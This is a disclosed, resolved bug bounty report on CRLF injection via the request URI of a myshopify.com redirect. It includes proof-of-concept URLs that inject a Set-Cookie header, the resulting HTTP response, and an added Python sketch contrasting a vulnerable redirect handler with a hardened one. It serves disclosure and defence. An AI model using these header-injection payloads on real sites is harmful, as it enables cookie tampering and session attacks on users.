[www.*.myshopify.com] CRLF Injection

Disclosed: 2015-06-10 17:31:32 By bobrov To shopify
Vulnerability Details
CRLF Injection via Request-URI

PoC:
http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;
https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;

HTTP Response:
```
HTTP/1.1 302 Moved Temporarily
...
Location: http://myshopify.com/xxcrlftest
Set-Cookie:test=test;domain=.myshopify.com;
```

Result: Creating a cookie-param "test=test" on *.myshopify.com
Report Stats
  • Report ID: 66386
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
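
The report does not show the server-side code. As an added example (not Shopify's code and not part of the report), this Python sketch assumes a redirect handler that percent-decodes the request path before copying it into `Location`, and sets it beside a version that rejects control characters and re-encodes the path. All function names are hypothetical; the PoC path is the one quoted in the report.

```python
import re
from urllib.parse import quote, unquote

REDIRECT_HOST = "myshopify.com"  # host seen in the report's Location header

def location_naive(request_uri):
    """Assumed vulnerable pattern: decode the path, copy it into the header value."""
    return f"http://{REDIRECT_HOST}{unquote(request_uri)}"

def location_safe(request_uri):
    """Decode once, refuse control characters, re-encode before writing the header."""
    path = unquote(request_uri)
    if re.search(r"[\x00-\x1f\x7f]", path):
        raise ValueError("control character in redirect target")
    return f"http://{REDIRECT_HOST}{quote(path, safe='/')}"

def render_302(location):
    """Serialize a minimal 302 the way a server without header validation would."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: {location}\r\n"
            "\r\n").encode("latin-1")

def header_names(raw):
    """Parse header names as a lenient client does: a bare LF also ends a line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = re.split(r"\r\n|\n", head)[1:]  # skip the status line
    return [line.split(":", 1)[0].strip().lower() for line in lines if ":" in line]

if __name__ == "__main__":
    poc = "/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;"  # from the report
    benign = "/collections/all%20items"  # constructed sample path

    # Naive handler: the decoded LF splits the Location value into a second header.
    print(header_names(render_302(location_naive(poc))))

    # Hardened handler: the PoC path is rejected, the benign one round-trips.
    try:
        location_safe(poc)
    except ValueError as exc:
        print("rejected:", exc)
    print(header_names(render_302(location_safe(benign))))
```

Rejecting the request is the stricter choice; a handler that must still redirect can skip the check and rely on the re-encoding step, which turns a decoded line feed back into `%0A` so it can never end the header line.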